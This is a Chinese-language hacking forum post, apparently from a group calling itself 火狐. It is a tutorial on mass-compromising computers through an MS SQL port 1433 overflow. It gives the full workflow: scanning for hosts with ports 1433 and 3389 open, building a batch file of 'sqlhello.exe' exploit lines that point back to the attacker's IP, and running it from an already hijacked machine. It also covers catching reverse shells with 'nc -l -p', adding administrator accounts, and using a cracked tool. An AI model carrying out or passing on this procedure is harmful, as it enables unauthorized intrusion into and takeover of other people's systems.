近日一QQ上的兄弟跟我说他近日用1433溢出，一天得到二十台鸡，我狂晕！
问了一下，他说用批处理实现，呵呵！于是有了此文！

在开始前，先准备工具，如下：
溢出工具，监听工具　，记事本，易优字典生成器，扫描小工具

1.扫呀　扫到的IP保存下来

至于用什么扫，随你，我是上肉鸡扫的，所以在CMD下撒，用小工具scanner狂扫1433的哈哈

！保存IP成列表，再导入另一个小工具，LScanPort2.0beta版，用来扫其中开了3389的机子，再保存IP成另一个列表，OK!

上面的意思，懂了吧，就是扫开了1433　和3389的　机子，其实方法好多的，代理猎手也可以，看自己吧！有好工具别忘了在后面跟贴！！

2.做成批处理

首先说一下格式是：
sqlhello.exe 溢出IP 端口 本地IP 听的端口
就这样。。把扫到的全替换成这样`
就OK了`

呵呵，就这样，可是至于如何实现呢，我想你不会每个IP段前后加几句话，累死人的大哥！
于是我找呀找，用到记事本的替换功能，比如你扫的IP段是219.111.***.***　则可以用替换功能将219.替换成sqlhello.exe 219.懂了吧，这是前面！

至于后面呢，我找了一个小工具，易优字典生成器，它有一个功能就是修改字典，在每个后面插入字符（此功能不注册可以用），在前面插入字符（此功能要注册）不破解有限制，我找了一个破解补丁就可了！后面加上1433　你的IP　监听端口　，OK，这样可以了吧
好了，再另存为BAT文件，呵呵呵　！

我呢，懒得存为BAT还上传到肉鸡，晕！
我是在对方的CMD下copy con 1.bat
然后复制刚才做好的呵呵，保存就可了！
把溢出程序和NC上传到1.bat所在目录，就可以了！

3.开始呀，执行批处理，用NC监听
开一个CMD执行批处理，开始狂溢出！
1.bat

同时，开一个CMD监听撒！

nc -l -p 端口

4.如果运气好，就会得到对方的shell
我中午上课前在肉鸡上测试了一下，成功率不太理想，两台！当时要上课了，我也没来得及放什么后门，加了个用户提到管理员就走人了！
再下课来，都跑了！！
至于想在对方的CMD下下载什么的，请看我的关于CMD中的下载
至于开3389　开TELNET的，网上教程多的是，呵！
至于做隐藏账号之类的，得到管理员密码的，请看我的关于账号，关于如何得到管理员密码！
OK，到此吧，有好的意见，好的思路，共享撒！
火狐是个大家庭，得靠我们自己撒！

补充一下：
用NC得到对方的shell后，另一个CMD还在狂溢出，哈哈！所以呢，用ctrl+C
啦，哈哈！搞定一台，再来开始又一轮狂溢出，如此下去，祝你好运！